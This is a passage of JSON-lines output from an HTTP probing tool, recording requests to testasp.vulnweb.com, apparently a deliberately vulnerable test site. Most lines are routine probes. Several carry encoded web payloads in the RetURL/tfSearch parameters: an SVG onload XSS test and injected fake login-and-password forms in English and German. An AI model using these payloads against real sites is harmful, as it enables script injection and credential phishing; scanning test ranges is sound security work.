found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/%22,\",\"time\":\"349.576966ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:22.837211933Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/–\",\"input\":\"http://testasp.vulnweb.com/%E2%80%93\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/%E2%80%93\",\"time\":\"348.104406ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:22.87539501Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/’\",\"input\":\"http://testasp.vulnweb.com/%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/%E2%80%99\",\"time\":\"354.443001ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:22.980907094Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Acunetix\",\"input\":\"http://testasp.vulnweb.com/Acunetix\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Acunetix\",\"time\":\"353.340609ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.187451133Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Default.asp\",\"input\":\"http://testasp.vulnweb.com/Default.asp\",\"title\":\"acuforum forums\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Default.asp\",\"time\":\"352.592883ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":46,\"status_code\":200,\"content_length\":3539,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.211972305Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Images/logo.gif\",\"input\":\"http://testasp.vulnweb.com/Images/logo.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Images/logo.gif\",\"time\":\"346.483883ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":21,\"lines\":26,\"status_code\":200,\"content_length\":4933,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.214944772Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Images/logo.gif’\",\"input\":\"http://testasp.vulnweb.com/Images/logo.gif%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Images/logo.gif%E2%80%99\",\"time\":\"348.560385ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.227919969Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp\",\"input\":\"http://testasp.vulnweb.com/Login.asp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp\",\"time\":\"351.035928ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3194,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.252260469Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp[/url\",\"input\":\"http://testasp.vulnweb.com/Login.asp%5B/url\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp[/url\",\"time\":\"355.438198ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.256709054Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FDefault%2Easp%3F\",\"time\":\"347.065779ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3198,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.261298836Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3FCookie%3A\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3FCookie%3A\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FDefault%2Easp%3FCookie%3A\",\"time\":\"350.787231ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.293128006Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FLogin%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FLogin%2Easp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FLogin%2Easp%3F\",\"time\":\"348.80641ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3194,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:23.457231523Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FLogin.asp%3F\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FLogin.asp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FLogin.asp%3F\",\"time\":\"340.90942ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3194,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.718896312Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FRegister%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FRegister%2Easp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FRegister%2Easp%3F\",\"time\":\"353.088416ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.724145321Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch\",\"time\":\"342.827ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3212,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.726060246Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3F\",\"time\":\"352.713611ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3196,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.732113049Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253\",\"time\":\"343.159195ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3230,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.736550758Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D\",\"time\":\"352.154667ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.739142129Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi\",\"time\":\"344.247494ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3292,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.739243117Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E\",\"time\":\"347.665845ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3520,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.751113764Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E\",\"time\":\"348.654799ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":4406,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.750795165Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B\",\"time\":\"347.86833ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3314,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.758438691Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp\",\"time\":\"348.705861ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3480,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.759390636Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E\",\"time\":\"361.359906ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":4380,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.767081208Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F\",\"time\":\"340.98263ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3618,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.803834707Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253\",\"time\":\"357.26549ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 